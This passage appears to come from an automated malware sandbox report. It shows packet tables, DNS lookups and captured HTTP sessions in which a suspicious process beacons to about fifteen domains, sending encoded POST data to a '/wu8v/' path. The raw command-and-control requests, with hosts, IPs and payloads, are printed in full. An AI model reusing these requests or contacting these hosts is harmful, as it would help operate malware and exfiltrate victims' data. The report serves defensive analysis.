                                                                                                                    May 8, 2024 14:08:22.948663950 CEST804978762.149.128.40192.168.2.4
                                                                                                                    May 8, 2024 14:08:22.948753119 CEST4978780192.168.2.462.149.128.40
                                                                                                                    May 8, 2024 14:08:22.950635910 CEST4978780192.168.2.462.149.128.40
                                                                                                                    May 8, 2024 14:08:23.281723022 CEST804978762.149.128.40192.168.2.4
                                                                                                                    May 8, 2024 14:08:23.281857967 CEST804978762.149.128.40192.168.2.4
                                                                                                                    May 8, 2024 14:08:23.281960011 CEST804978762.149.128.40192.168.2.4
                                                                                                                    May 8, 2024 14:08:23.281971931 CEST804978762.149.128.40192.168.2.4
                                                                                                                    May 8, 2024 14:08:23.281995058 CEST4978780192.168.2.462.149.128.40
                                                                                                                    May 8, 2024 14:08:23.282062054 CEST4978780192.168.2.462.149.128.40
                                                                                                                    May 8, 2024 14:08:23.615241051 CEST804978762.149.128.40192.168.2.4
                                                                                                                    May 8, 2024 14:08:23.615396976 CEST4978780192.168.2.462.149.128.40
                                                                                                                    May 8, 2024 14:08:23.618288040 CEST4978780192.168.2.462.149.128.40
                                                                                                                    May 8, 2024 14:08:23.947650909 CEST804978762.149.128.40192.168.2.4
                                                                                                                    May 8, 2024 14:08:37.715706110 CEST4978880192.168.2.4137.220.252.40
                                                                                                                    May 8, 2024 14:08:37.988276005 CEST8049788137.220.252.40192.168.2.4
                                                                                                                    May 8, 2024 14:08:37.988389969 CEST4978880192.168.2.4137.220.252.40
                                                                                                                    May 8, 2024 14:08:38.089293003 CEST4978880192.168.2.4137.220.252.40
                                                                                                                    May 8, 2024 14:08:38.361790895 CEST8049788137.220.252.40192.168.2.4
                                                                                                                    May 8, 2024 14:08:38.361881018 CEST8049788137.220.252.40192.168.2.4
                                                                                                                    May 8, 2024 14:08:38.361896038 CEST8049788137.220.252.40192.168.2.4
                                                                                                                    May 8, 2024 14:08:38.361952066 CEST4978880192.168.2.4137.220.252.40
                                                                                                                    May 8, 2024 14:08:39.600817919 CEST4978880192.168.2.4137.220.252.40
                                                                                                                    May 8, 2024 14:08:40.820291042 CEST4978980192.168.2.4137.220.252.40
                                                                                                                    May 8, 2024 14:08:41.097242117 CEST8049789137.220.252.40192.168.2.4
                                                                                                                    May 8, 2024 14:08:41.097384930 CEST4978980192.168.2.4137.220.252.40
                                                                                                                    May 8, 2024 14:08:41.099900007 CEST4978980192.168.2.4137.220.252.40
                                                                                                                    May 8, 2024 14:08:41.373892069 CEST8049789137.220.252.40192.168.2.4
                                                                                                                    May 8, 2024 14:08:41.374042034 CEST8049789137.220.252.40192.168.2.4
                                                                                                                    May 8, 2024 14:08:41.374054909 CEST8049789137.220.252.40192.168.2.4
                                                                                                                    May 8, 2024 14:08:41.374138117 CEST4978980192.168.2.4137.220.252.40
                                                                                                                    May 8, 2024 14:08:42.616415977 CEST4978980192.168.2.4137.220.252.40
                                                                                                                    May 8, 2024 14:08:43.640578985 CEST4979080192.168.2.4137.220.252.40
                                                                                                                    May 8, 2024 14:08:43.913093090 CEST8049790137.220.252.40192.168.2.4
                                                                                                                    May 8, 2024 14:08:43.913224936 CEST4979080192.168.2.4137.220.252.40
                                                                                                                    May 8, 2024 14:08:43.915498972 CEST4979080192.168.2.4137.220.252.40
                                                                                                                    May 8, 2024 14:08:44.187721968 CEST8049790137.220.252.40192.168.2.4
                                                                                                                    May 8, 2024 14:08:44.187735081 CEST8049790137.220.252.40192.168.2.4
                                                                                                                    May 8, 2024 14:08:44.187742949 CEST8049790137.220.252.40192.168.2.4
                                                                                                                    May 8, 2024 14:08:44.187752962 CEST8049790137.220.252.40192.168.2.4
                                                                                                                    May 8, 2024 14:08:44.187978029 CEST8049790137.220.252.40192.168.2.4
                                                                                                                    May 8, 2024 14:08:44.187988997 CEST8049790137.220.252.40192.168.2.4
                                                                                                                    May 8, 2024 14:08:44.188039064 CEST4979080192.168.2.4137.220.252.40
                                                                                                                    May 8, 2024 14:08:45.432756901 CEST4979080192.168.2.4137.220.252.40
                                                                                                                    May 8, 2024 14:08:46.447571039 CEST4979180192.168.2.4137.220.252.40
                                                                                                                    May 8, 2024 14:08:46.718130112 CEST8049791137.220.252.40192.168.2.4
                                                                                                                    May 8, 2024 14:08:46.720784903 CEST4979180192.168.2.4137.220.252.40
                                                                                                                    May 8, 2024 14:08:46.724365950 CEST4979180192.168.2.4137.220.252.40
                                                                                                                    May 8, 2024 14:08:46.994585991 CEST8049791137.220.252.40192.168.2.4
                                                                                                                    May 8, 2024 14:08:46.994688034 CEST8049791137.220.252.40192.168.2.4
                                                                                                                    May 8, 2024 14:08:46.994716883 CEST8049791137.220.252.40192.168.2.4
                                                                                                                    May 8, 2024 14:08:46.994927883 CEST4979180192.168.2.4137.220.252.40
                                                                                                                    May 8, 2024 14:08:46.997283936 CEST4979180192.168.2.4137.220.252.40
                                                                                                                    May 8, 2024 14:08:47.267581940 CEST8049791137.220.252.40192.168.2.4
                                                                                                                    May 8, 2024 14:08:52.451229095 CEST4979280192.168.2.491.195.240.123
                                                                                                                    May 8, 2024 14:08:52.765539885 CEST804979291.195.240.123192.168.2.4
                                                                                                                    May 8, 2024 14:08:52.765707970 CEST4979280192.168.2.491.195.240.123
                                                                                                                    May 8, 2024 14:08:52.767493010 CEST4979280192.168.2.491.195.240.123
                                                                                                                    May 8, 2024 14:08:53.079268932 CEST804979291.195.240.123192.168.2.4
                                                                                                                    May 8, 2024 14:08:53.079293966 CEST804979291.195.240.123192.168.2.4
                                                                                                                    May 8, 2024 14:08:53.079380989 CEST4979280192.168.2.491.195.240.123
                                                                                                                    May 8, 2024 14:08:54.272955894 CEST4979280192.168.2.491.195.240.123
                                                                                                                    May 8, 2024 14:08:57.688961029 CEST4979380192.168.2.491.195.240.123
                                                                                                                    May 8, 2024 14:08:58.001584053 CEST804979391.195.240.123192.168.2.4
                                                                                                                    May 8, 2024 14:08:58.001677036 CEST4979380192.168.2.491.195.240.123
                                                                                                                    May 8, 2024 14:08:58.007967949 CEST4979380192.168.2.491.195.240.123
                                                                                                                    May 8, 2024 14:08:58.320055962 CEST804979391.195.240.123192.168.2.4
                                                                                                                    May 8, 2024 14:08:58.320076942 CEST804979391.195.240.123192.168.2.4
                                                                                                                    May 8, 2024 14:08:58.320128918 CEST4979380192.168.2.491.195.240.123
                                                                                                                    May 8, 2024 14:08:59.850869894 CEST4979380192.168.2.491.195.240.123
                                                                                                                    May 8, 2024 14:09:00.869421959 CEST4979480192.168.2.491.195.240.123
                                                                                                                    May 8, 2024 14:09:01.180738926 CEST804979491.195.240.123192.168.2.4
                                                                                                                    May 8, 2024 14:09:01.180821896 CEST4979480192.168.2.491.195.240.123
                                                                                                                    May 8, 2024 14:09:01.183187962 CEST4979480192.168.2.491.195.240.123
                                                                                                                    May 8, 2024 14:09:01.494430065 CEST804979491.195.240.123192.168.2.4
                                                                                                                    May 8, 2024 14:09:01.494455099 CEST804979491.195.240.123192.168.2.4
                                                                                                                    May 8, 2024 14:09:01.494537115 CEST804979491.195.240.123192.168.2.4
                                                                                                                    May 8, 2024 14:09:01.495297909 CEST804979491.195.240.123192.168.2.4
                                                                                                                    May 8, 2024 14:09:01.495310068 CEST804979491.195.240.123192.168.2.4
                                                                                                                    May 8, 2024 14:09:01.495369911 CEST4979480192.168.2.491.195.240.123

                                                                                                                    UDP Packets

                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    May 8, 2024 14:05:26.767388105 CEST5825053192.168.2.41.1.1.1
                                                                                                                    May 8, 2024 14:05:27.125714064 CEST53582501.1.1.1192.168.2.4
                                                                                                                    May 8, 2024 14:05:42.953311920 CEST4958353192.168.2.41.1.1.1
                                                                                                                    May 8, 2024 14:05:43.573443890 CEST53495831.1.1.1192.168.2.4
                                                                                                                    May 8, 2024 14:05:58.216180086 CEST5015253192.168.2.41.1.1.1
                                                                                                                    May 8, 2024 14:05:58.810854912 CEST53501521.1.1.1192.168.2.4
                                                                                                                    May 8, 2024 14:06:13.407356024 CEST6158453192.168.2.41.1.1.1
                                                                                                                    May 8, 2024 14:06:14.260993958 CEST53615841.1.1.1192.168.2.4
                                                                                                                    May 8, 2024 14:06:29.512506008 CEST6516753192.168.2.41.1.1.1
                                                                                                                    May 8, 2024 14:06:29.724989891 CEST53651671.1.1.1192.168.2.4
                                                                                                                    May 8, 2024 14:06:44.950481892 CEST5908353192.168.2.41.1.1.1
                                                                                                                    May 8, 2024 14:06:45.197783947 CEST53590831.1.1.1192.168.2.4
                                                                                                                    May 8, 2024 14:06:58.822690964 CEST6547253192.168.2.41.1.1.1
                                                                                                                    May 8, 2024 14:06:59.478615999 CEST53654721.1.1.1192.168.2.4
                                                                                                                    May 8, 2024 14:07:13.826956987 CEST5427653192.168.2.41.1.1.1
                                                                                                                    May 8, 2024 14:07:14.034096003 CEST53542761.1.1.1192.168.2.4
                                                                                                                    May 8, 2024 14:07:29.025877953 CEST6087053192.168.2.41.1.1.1
                                                                                                                    May 8, 2024 14:07:29.548338890 CEST53608701.1.1.1192.168.2.4
                                                                                                                    May 8, 2024 14:07:43.793378115 CEST6375053192.168.2.41.1.1.1
                                                                                                                    May 8, 2024 14:07:44.242402077 CEST53637501.1.1.1192.168.2.4
                                                                                                                    May 8, 2024 14:07:58.703850031 CEST6406953192.168.2.41.1.1.1
                                                                                                                    May 8, 2024 14:07:59.053884983 CEST53640691.1.1.1192.168.2.4
                                                                                                                    May 8, 2024 14:08:13.404006004 CEST6293353192.168.2.41.1.1.1
                                                                                                                    May 8, 2024 14:08:14.035144091 CEST53629331.1.1.1192.168.2.4
                                                                                                                    May 8, 2024 14:08:28.638375998 CEST6422753192.168.2.41.1.1.1
                                                                                                                    May 8, 2024 14:08:28.829792023 CEST53642271.1.1.1192.168.2.4
                                                                                                                    May 8, 2024 14:08:37.105942965 CEST6319953192.168.2.41.1.1.1
                                                                                                                    May 8, 2024 14:08:37.638356924 CEST53631991.1.1.1192.168.2.4
                                                                                                                    May 8, 2024 14:08:52.011945963 CEST5412653192.168.2.41.1.1.1
                                                                                                                    May 8, 2024 14:08:52.388293982 CEST53541261.1.1.1192.168.2.4

                                                                                                                    DNS Queries

                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                    May 8, 2024 14:05:26.767388105 CEST192.168.2.41.1.1.10xbb23Standard query (0)www.fivetownsjcc.comA (IP address)IN (0x0001)false
                                                                                                                    May 8, 2024 14:05:42.953311920 CEST192.168.2.41.1.1.10xdc76Standard query (0)www.auetravel.kzA (IP address)IN (0x0001)false
                                                                                                                    May 8, 2024 14:05:58.216180086 CEST192.168.2.41.1.1.10xbb7dStandard query (0)www.rltattoo.comA (IP address)IN (0x0001)false
                                                                                                                    May 8, 2024 14:06:13.407356024 CEST192.168.2.41.1.1.10x66b4Standard query (0)www.wp-bits.onlineA (IP address)IN (0x0001)false
                                                                                                                    May 8, 2024 14:06:29.512506008 CEST192.168.2.41.1.1.10x3c5bStandard query (0)www.luckydomainz.shopA (IP address)IN (0x0001)false
                                                                                                                    May 8, 2024 14:06:44.950481892 CEST192.168.2.41.1.1.10xaf60Standard query (0)www.selectif.xyzA (IP address)IN (0x0001)false
                                                                                                                    May 8, 2024 14:06:58.822690964 CEST192.168.2.41.1.1.10x481Standard query (0)www.yekobie.comA (IP address)IN (0x0001)false
                                                                                                                    May 8, 2024 14:07:13.826956987 CEST192.168.2.41.1.1.10x847cStandard query (0)www.getgoodscrub.comA (IP address)IN (0x0001)false
                                                                                                                    May 8, 2024 14:07:29.025877953 CEST192.168.2.41.1.1.10x71d7Standard query (0)www.xn--yzyp76d.comA (IP address)IN (0x0001)false
                                                                                                                    May 8, 2024 14:07:43.793378115 CEST192.168.2.41.1.1.10xeafcStandard query (0)www.btpbox.comA (IP address)IN (0x0001)false
                                                                                                                    May 8, 2024 14:07:58.703850031 CEST192.168.2.41.1.1.10x20bfStandard query (0)www.glissy.caA (IP address)IN (0x0001)false
                                                                                                                    May 8, 2024 14:08:13.404006004 CEST192.168.2.41.1.1.10xaafStandard query (0)www.insertcoen.comA (IP address)IN (0x0001)false
                                                                                                                    May 8, 2024 14:08:28.638375998 CEST192.168.2.41.1.1.10xf03Standard query (0)www.lebonergy.comA (IP address)IN (0x0001)false
                                                                                                                    May 8, 2024 14:08:37.105942965 CEST192.168.2.41.1.1.10xad60Standard query (0)www.387mfyr.sbsA (IP address)IN (0x0001)false
                                                                                                                    May 8, 2024 14:08:52.011945963 CEST192.168.2.41.1.1.10xefa2Standard query (0)www.lm2ue.usA (IP address)IN (0x0001)false

                                                                                                                    DNS Answers

                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                    May 8, 2024 14:05:27.125714064 CEST1.1.1.1192.168.2.40xbb23No error (0)www.fivetownsjcc.comfivetownsjcc.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                    May 8, 2024 14:05:27.125714064 CEST1.1.1.1192.168.2.40xbb23No error (0)fivetownsjcc.com208.112.85.150A (IP address)IN (0x0001)false
                                                                                                                    May 8, 2024 14:05:43.573443890 CEST1.1.1.1192.168.2.40xdc76No error (0)www.auetravel.kz89.35.125.17A (IP address)IN (0x0001)false
                                                                                                                    May 8, 2024 14:05:58.810854912 CEST1.1.1.1192.168.2.40xbb7dNo error (0)www.rltattoo.com38.63.111.149A (IP address)IN (0x0001)false
                                                                                                                    May 8, 2024 14:06:14.260993958 CEST1.1.1.1192.168.2.40x66b4No error (0)www.wp-bits.online116.203.164.244A (IP address)IN (0x0001)false
                                                                                                                    May 8, 2024 14:06:29.724989891 CEST1.1.1.1192.168.2.40x3c5bNo error (0)www.luckydomainz.shopparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                    May 8, 2024 14:06:29.724989891 CEST1.1.1.1192.168.2.40x3c5bNo error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                                                                                                                    May 8, 2024 14:06:45.197783947 CEST1.1.1.1192.168.2.40xaf60No error (0)www.selectif.xyz203.161.46.103A (IP address)IN (0x0001)false
                                                                                                                    May 8, 2024 14:06:59.478615999 CEST1.1.1.1192.168.2.40x481No error (0)www.yekobie.comyekobie.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                    May 8, 2024 14:06:59.478615999 CEST1.1.1.1192.168.2.40x481No error (0)yekobie.com185.135.132.99A (IP address)IN (0x0001)false
                                                                                                                    May 8, 2024 14:07:14.034096003 CEST1.1.1.1192.168.2.40x847cNo error (0)www.getgoodscrub.com35.213.232.35A (IP address)IN (0x0001)false
                                                                                                                    May 8, 2024 14:07:29.548338890 CEST1.1.1.1192.168.2.40x71d7No error (0)www.xn--yzyp76d.com47.76.62.167A (IP address)IN (0x0001)false
                                                                                                                    May 8, 2024 14:07:44.242402077 CEST1.1.1.1192.168.2.40xeafcNo error (0)www.btpbox.com213.36.252.182A (IP address)IN (0x0001)false
                                                                                                                    May 8, 2024 14:07:44.242402077 CEST1.1.1.1192.168.2.40xeafcNo error (0)www.btpbox.com213.36.252.183A (IP address)IN (0x0001)false
                                                                                                                    May 8, 2024 14:07:59.053884983 CEST1.1.1.1192.168.2.40x20bfNo error (0)www.glissy.caglissy.caCNAME (Canonical name)IN (0x0001)false
                                                                                                                    May 8, 2024 14:07:59.053884983 CEST1.1.1.1192.168.2.40x20bfNo error (0)glissy.ca70.32.23.111A (IP address)IN (0x0001)false
                                                                                                                    May 8, 2024 14:08:14.035144091 CEST1.1.1.1192.168.2.40xaafNo error (0)www.insertcoen.cominsertcoen.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                    May 8, 2024 14:08:14.035144091 CEST1.1.1.1192.168.2.40xaafNo error (0)insertcoen.com62.149.128.40A (IP address)IN (0x0001)false
                                                                                                                    May 8, 2024 14:08:28.829792023 CEST1.1.1.1192.168.2.40xf03Name error (3)www.lebonergy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                    May 8, 2024 14:08:37.638356924 CEST1.1.1.1192.168.2.40xad60No error (0)www.387mfyr.sbs137.220.252.40A (IP address)IN (0x0001)false
                                                                                                                    May 8, 2024 14:08:52.388293982 CEST1.1.1.1192.168.2.40xefa2No error (0)www.lm2ue.us91.195.240.123A (IP address)IN (0x0001)false

                                                                                                                    HTTP Request Dependency Graph

                                                                                                                    • www.fivetownsjcc.com
                                                                                                                    • www.auetravel.kz
                                                                                                                    • www.rltattoo.com
                                                                                                                    • www.wp-bits.online
                                                                                                                    • www.luckydomainz.shop
                                                                                                                    • www.selectif.xyz
                                                                                                                    • www.yekobie.com
                                                                                                                    • www.getgoodscrub.com
                                                                                                                    • www.xn--yzyp76d.com
                                                                                                                    • www.btpbox.com
                                                                                                                    • www.glissy.ca
                                                                                                                    • www.insertcoen.com
                                                                                                                    • www.387mfyr.sbs
                                                                                                                    • www.lm2ue.us

                                                                                                                    HTTP Packets

                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    0192.168.2.449742208.112.85.150802132C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    May 8, 2024 14:05:27.363748074 CEST459OUTGET /wu8v/?MdtlcTm=qj5NyNfN5WRMG7LniAROgWXsn6IsT6LjPGDeNkCQJp+HAmWfWpmvawkojhaRs1ogLHUlWi64I+vgy847wrcuJ4qAlI0oKyKfHw/MBjiNhxVy0+aqylgl+KA=&_X=ClAdyH4P7rA8z HTTP/1.1
                                                                                                                    Host: www.fivetownsjcc.com
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    May 8, 2024 14:05:27.603955030 CEST383INHTTP/1.1 404 Not Found
                                                                                                                    Date: Wed, 08 May 2024 12:05:23 GMT
                                                                                                                    Server: Apache
                                                                                                                    X-SERVER: 3908
                                                                                                                    Content-Length: 203
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 77 75 38 76 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /wu8v/ was not found on this server.</p></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    1192.168.2.44974389.35.125.17802132C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    May 8, 2024 14:05:43.974493980 CEST718OUTPOST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.auetravel.kz
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.auetravel.kz
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 204
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.auetravel.kz/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Raw: 4d 64 74 6c 63 54 6d 3d 6c 32 31 70 77 5a 38 38 47 44 33 75 49 31 5a 51 63 71 50 4d 49 4a 6c 72 65 34 57 76 75 75 33 71 6b 4c 33 76 75 33 33 2f 2b 61 56 41 43 42 38 52 71 37 5a 6b 42 56 74 4d 31 46 48 57 75 2b 74 52 76 36 30 66 46 47 79 6b 64 6f 4e 78 52 4f 47 69 41 6d 69 51 2b 35 58 68 4d 69 37 37 73 34 71 64 66 72 74 4a 48 69 6d 72 42 46 57 4d 77 41 38 35 50 4d 56 35 76 7a 6d 4a 32 57 79 36 6d 69 73 42 73 67 6e 63 34 75 4e 6a 30 79 41 42 6e 54 45 37 6f 6c 76 70 73 36 6b 61 4d 2b 39 37 73 47 79 74 79 49 34 6a 52 4e 51 39 79 77 2f 72 4a 4c 51 70 70 2f 73 54 4a 41 56 51 30 2f 56 37 70 56 6c 38 71 41 3d 3d
                                                                                                                    Data Ascii: MdtlcTm=l21pwZ88GD3uI1ZQcqPMIJlre4Wvuu3qkL3vu33/+aVACB8Rq7ZkBVtM1FHWu+tRv60fFGykdoNxROGiAmiQ+5XhMi77s4qdfrtJHimrBFWMwA85PMV5vzmJ2Wy6misBsgnc4uNj0yABnTE7olvps6kaM+97sGytyI4jRNQ9yw/rJLQpp/sTJAVQ0/V7pVl8qA==
                                                                                                                    May 8, 2024 14:05:44.366837025 CEST350INHTTP/1.1 301 Moved Permanently
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 08 May 2024 12:05:44 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 162
                                                                                                                    Connection: close
                                                                                                                    Location: http://auetravel.kz/wu8v/
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    2192.168.2.44974489.35.125.17802132C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    May 8, 2024 14:05:46.897799015 CEST738OUTPOST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.auetravel.kz
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.auetravel.kz
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 224
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.auetravel.kz/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Raw: 4d 64 74 6c 63 54 6d 3d 6c 32 31 70 77 5a 38 38 47 44 33 75 4f 57 42 51 66 4e 62 4d 5a 5a 6c 71 55 59 57 76 31 65 32 68 6b 4c 37 76 75 32 7a 4a 2b 73 39 41 46 6a 6b 52 74 34 42 6b 41 56 74 4d 2b 6c 48 5a 71 2b 74 61 76 36 34 74 46 44 4b 6b 64 6f 78 78 52 50 32 69 42 56 36 54 2f 70 58 5a 48 43 37 31 30 59 71 64 66 72 74 4a 48 69 43 56 42 46 4f 4d 77 51 73 35 4e 74 56 36 7a 6a 6e 37 78 57 79 36 69 69 74 70 73 67 6e 36 34 76 67 2b 30 77 34 42 6e 58 41 37 6f 30 76 75 6d 36 6b 63 52 75 38 56 6e 46 69 6e 35 61 46 30 58 4f 35 61 38 45 4b 4e 4d 4e 42 7a 34 4f 4e 45 62 41 78 6a 70 34 63 50 6b 57 59 31 78 42 2f 5a 4b 46 61 54 51 42 30 57 30 74 65 30 5a 53 32 65 48 35 6f 3d
                                                                                                                    Data Ascii: MdtlcTm=l21pwZ88GD3uOWBQfNbMZZlqUYWv1e2hkL7vu2zJ+s9AFjkRt4BkAVtM+lHZq+tav64tFDKkdoxxRP2iBV6T/pXZHC710YqdfrtJHiCVBFOMwQs5NtV6zjn7xWy6iitpsgn64vg+0w4BnXA7o0vum6kcRu8VnFin5aF0XO5a8EKNMNBz4ONEbAxjp4cPkWY1xB/ZKFaTQB0W0te0ZS2eH5o=
                                                                                                                    May 8, 2024 14:05:47.288647890 CEST350INHTTP/1.1 301 Moved Permanently
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 08 May 2024 12:05:47 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 162
                                                                                                                    Connection: close
                                                                                                                    Location: http://auetravel.kz/wu8v/
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    3192.168.2.44974689.35.125.17802132C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    May 8, 2024 14:05:49.825542927 CEST10820OUTPOST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.auetravel.kz
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.auetravel.kz
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10304
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.auetravel.kz/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
